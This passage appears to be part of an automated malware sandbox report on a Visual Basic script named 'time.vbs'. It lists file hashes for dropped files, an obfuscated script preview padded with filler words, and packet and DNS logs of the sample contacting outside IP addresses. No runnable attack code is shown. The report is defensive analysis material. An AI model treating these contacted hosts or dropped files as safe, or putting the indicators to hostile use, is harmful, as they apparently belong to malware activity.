                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8
                                                      Entropy (8bit):3.0
                                                      Encrypted:false
                                                      SSDEEP:3:+vo4:r4
                                                      MD5:27DA8B6EE2C5E189B88AB816E31C04DA
                                                      SHA1:9337D800B81694CF89240D9C6661ED6FAA352B4B
                                                      SHA-256:ABBB7417D552D8DF9FEB0D685C236BDD4F6617E11AE8B6DFAB201B7B5468238E
                                                      SHA-512:504EA5CB4A52FB928602264D7D5E11B85022EE08FCE1F8FE8421AA2A214326A384DAFB05EC01A52B43E7F306AFA62FF8B903770559633801876A383A36F615D1
                                                      Malicious:false
                                                      Preview:......&A
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):461284
                                                      Entropy (8bit):5.956027697684519
                                                      Encrypted:false
                                                      SSDEEP:12288:Tj0oKWcXrBbIUKPO/XLOgpK1JfvmI27kzBfds:TAT7dIUoOygpKLRHfG
                                                      MD5:6D9B6ACCCEEB8D1903FF212FE516A08E
                                                      SHA1:DDE8EF0BD8CEE4DD7593DE179183A6A0AFB5E1CC
                                                      SHA-256:2F65E63154EC396206D3CA6CE8AC0210B09598F0C61E6038161AD66FB5E80138
                                                      SHA-512:48031EFF35C6EF2DC0C05E750DDC960C6031FBB16F41843F0F0C01A0C59D76B71283793428F20974800FF880555606D6FBB4E1AD8F48220A38E9725ED6EAC420
                                                      Malicious:false
                                                      File type:ASCII text, with CRLF line terminators
                                                      Entropy (8bit):5.0613947747922605
                                                      TrID:
                                                      • Visual Basic Script (13500/0) 100.00%
                                                      File name:time.vbs
                                                      File size:73'862 bytes
                                                      MD5:673fa3ac445c7ae448c49ef3d154b4e8
                                                      SHA1:097eaa21e81bf37a12a338e33366d429ef6a2ab9
                                                      SHA256:aeda53046f92e6a6f967262130c9238be1107224bd143399e6a66eae7ed2e401
                                                      SHA512:67d679238efe97f51db748c2c7bd916417f354d6fc8920c8df999e96bab63810707bd51473c4487db86f18e299831f0cc749a203c1ea58a5b3af0951ae3a406c
                                                      SSDEEP:1536:PddWp7iJTLvOMp4pR/1jvXgsVIx/4f3xeKG7lYY8zD+tNfvlEiEG9A:P+YrOMSn/Nv/VggheKebyiN3oG9A
                                                      TLSH:E7736DA5EB5909564C4A23ADFC815D82D67CC946012331A5FEC907DE630A8ACE3FD6CF
                                                      File Content Preview:..'Straitsmen hovedlinjernes sulfhydrate..'Couscouses bayonneskinker tommeskruen; heresimach bgetrernes,..Const Auskulterede = 64 ..'Mellemdistanceraket144. mummers stammefejdernes meiotically morth..'Ambulators grise acrolithic..'Undulately! funnyman sol
                                                      Icon Hash:68d69b8f86ab9a86
Timestamp                             | Source Port | Dest Port | Source IP      | Dest IP
May 23, 2024 18:24:05.861485958 CEST | 49730       | 443       | 192.168.2.4    | 172.67.170.105
May 23, 2024 18:24:05.861536980 CEST | 443         | 49730     | 172.67.170.105 | 192.168.2.4
May 23, 2024 18:24:05.861633062 CEST | 49730       | 443       | 192.168.2.4    | 172.67.170.105
May 23, 2024 18:24:05.871645927 CEST | 49730       | 443       | 192.168.2.4    | 172.67.170.105
May 23, 2024 18:24:05.871668100 CEST | 443         | 49730     | 172.67.170.105 | 192.168.2.4
May 23, 2024 18:24:06.354662895 CEST | 443         | 49730     | 172.67.170.105 | 192.168.2.4
May 23, 2024 18:24:06.354868889 CEST | 49730       | 443       | 192.168.2.4    | 172.67.170.105
May 23, 2024 18:24:06.358622074 CEST | 49730       | 443       | 192.168.2.4    | 172.67.170.105
May 23, 2024 18:24:06.358632088 CEST | 443         | 49730     | 172.67.170.105 | 192.168.2.4
May 23, 2024 18:24:06.359200954 CEST | 443         | 49730     | 172.67.170.105 | 192.168.2.4
May 23, 2024 18:24:06.370312929 CEST | 49730       | 443       | 192.168.2.4    | 172.67.170.105
May 23, 2024 18:24:06.410537958 CEST | 443         | 49730     | 172.67.170.105 | 192.168.2.4
May 23, 2024 18:24:06.888628960 CEST | 443         | 49730     | 172.67.170.105 | 192.168.2.4
May 23, 2024 18:24:06.888789892 CEST | 443         | 49730     | 172.67.170.105 | 192.168.2.4
May 23, 2024 18:24:06.888844967 CEST | 49730       | 443       | 192.168.2.4    | 172.67.170.105
May 23, 2024 18:24:06.891458988 CEST | 49730       | 443       | 192.168.2.4    | 172.67.170.105
May 23, 2024 18:24:06.964960098 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:06.965013981 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:06.965089083 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:06.965384960 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:06.965415001 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:07.690692902 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:07.693583012 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:07.693583012 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:07.693615913 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:07.693943024 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:07.695302010 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:07.738535881 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.323132038 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.323164940 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.323184967 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.323261023 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.323261023 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.323308945 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.323373079 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.335017920 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.335071087 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.335119009 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.335144997 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.335169077 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.335190058 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.413865089 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.413929939 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.414068937 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.414068937 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.414100885 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.414172888 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.426140070 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.426187992 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.426249981 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.426316023 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.426353931 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.426381111 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.435405970 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.435450077 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.435488939 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.435501099 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.435517073 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.435538054 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.444283962 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.444324970 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.444370031 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.444380045 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.444402933 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.444418907 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.506505013 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.506577015 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.506690025 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.506705999 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.506740093 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.506740093 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.513788939 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.513839006 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.513869047 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.513876915 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.513901949 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.513911963 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.521401882 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.521452904 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.521493912 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.521514893 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.521542072 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.521559954 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.533931971 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.533973932 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.534013033 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.534043074 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.534168005 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.534168005 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.594974995 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.595012903 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.595071077 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.595104933 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.595122099 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.595160007 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.602761030 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.602812052 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.602849007 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.602869987 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.602885008 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.602909088 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.611490011 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.611531973 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.611588001 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.611629963 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.611658096 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.611680031 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.617062092 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.617104053 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.617156982 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.617180109 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.617192984 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.617228031 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.624636889 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.624681950 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.624747992 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.624763966 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.624793053 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.624813080 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.631480932 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.631522894 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.631572962 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.631582975 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.631613970 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.631633043 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.654109955 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.654159069 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.654316902 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.654350042 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.654401064 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.660787106 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.660829067 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.660875082 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.660904884 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.660918951 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.660943031 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.687021017 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.687056065 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.687182903 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.687182903 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.687211037 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.687258005 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.692523003 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.692574024 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.692604065 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.692620993 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.692632914 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.692660093 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.697374105 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.697417974 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.697457075 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.697474003 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.697488070 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.697510004 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.701839924 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.701896906 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.701939106 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.701950073 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.701961040 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.701989889 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.705954075 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.705997944 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.706094027 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.706094027 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.706105947 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.706150055 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.709837914 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.709883928 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.709917068 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.709933043 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.709949017 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.709970951 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.744108915 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.744173050 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.744199991 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.744229078 CEST | 443         | 49731     | 69.31.136.57   | 192.168.2.4
May 23, 2024 18:24:08.744244099 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.744244099 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
May 23, 2024 18:24:08.744270086 CEST | 49731       | 443       | 192.168.2.4    | 69.31.136.57
                                                      May 23, 2024 18:24:08.772733927 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.772769928 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.772867918 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.772944927 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.773035049 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.777066946 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.777091026 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.777162075 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.777173996 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.777219057 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.779723883 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.779748917 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.779814959 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.779820919 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.779850006 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.779859066 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.780647039 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.780702114 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.780706882 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.780742884 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.780745029 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.780783892 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.781132936 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:58.788613081 CEST49739443192.168.2.4172.67.170.105
                                                      May 23, 2024 18:24:58.788696051 CEST44349739172.67.170.105192.168.2.4
                                                      May 23, 2024 18:24:58.788809061 CEST49739443192.168.2.4172.67.170.105
                                                      May 23, 2024 18:24:58.828202009 CEST49739443192.168.2.4172.67.170.105
                                                      May 23, 2024 18:24:58.828237057 CEST44349739172.67.170.105192.168.2.4
                                                      May 23, 2024 18:24:59.298937082 CEST44349739172.67.170.105192.168.2.4
                                                      May 23, 2024 18:24:59.299043894 CEST49739443192.168.2.4172.67.170.105
                                                      May 23, 2024 18:24:59.397644043 CEST49739443192.168.2.4172.67.170.105
                                                      May 23, 2024 18:24:59.397670031 CEST44349739172.67.170.105192.168.2.4
                                                      May 23, 2024 18:24:59.398799896 CEST44349739172.67.170.105192.168.2.4
                                                      May 23, 2024 18:24:59.398891926 CEST49739443192.168.2.4172.67.170.105
                                                      May 23, 2024 18:24:59.426181078 CEST49739443192.168.2.4172.67.170.105
                                                      May 23, 2024 18:24:59.470499992 CEST44349739172.67.170.105192.168.2.4
                                                      May 23, 2024 18:25:00.052546024 CEST44349739172.67.170.105192.168.2.4
                                                      May 23, 2024 18:25:00.052721977 CEST49739443192.168.2.4172.67.170.105
                                                      May 23, 2024 18:25:00.052726030 CEST44349739172.67.170.105192.168.2.4
                                                      May 23, 2024 18:25:00.052813053 CEST49739443192.168.2.4172.67.170.105
                                                      May 23, 2024 18:25:00.086716890 CEST49739443192.168.2.4172.67.170.105
                                                      May 23, 2024 18:25:00.086738110 CEST44349739172.67.170.105192.168.2.4
                                                      May 23, 2024 18:25:00.158967018 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:00.159079075 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:00.159174919 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:00.159460068 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:00.159492016 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:00.867283106 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:00.867399931 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:00.874780893 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:00.874802113 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:00.875047922 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:00.875113964 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:00.888694048 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:00.930516005 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.649799109 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.649888039 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.649929047 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.649957895 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.649964094 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.650017023 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.650029898 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.650094986 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.670989037 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.671000004 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.671169043 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.671183109 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.671286106 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.735253096 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.735318899 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.735384941 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.735414028 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.735431910 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.735460043 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.758692980 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.758723021 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.758821011 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.758846045 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.758899927 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.774223089 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.774245977 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.774308920 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.774318933 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.774368048 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.801302910 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.801346064 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.801517010 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.801517010 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.801546097 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.801595926 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.810553074 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.810636997 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.810645103 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.810693026 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.810758114 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.810842991 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.810904026 CEST49740443192.168.2.469.31.136.53
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 23, 2024 18:24:05.844877005 CEST | 63957 | 53 | 192.168.2.4 | 1.1.1.1
May 23, 2024 18:24:05.856153011 CEST | 53 | 63957 | 1.1.1.1 | 192.168.2.4
May 23, 2024 18:24:06.893080950 CEST | 62447 | 53 | 192.168.2.4 | 1.1.1.1
May 23, 2024 18:24:06.964212894 CEST | 53 | 62447 | 1.1.1.1 | 192.168.2.4
May 23, 2024 18:25:00.102287054 CEST | 54776 | 53 | 192.168.2.4 | 1.1.1.1
May 23, 2024 18:25:00.157999992 CEST | 53 | 54776 | 1.1.1.1 | 192.168.2.4
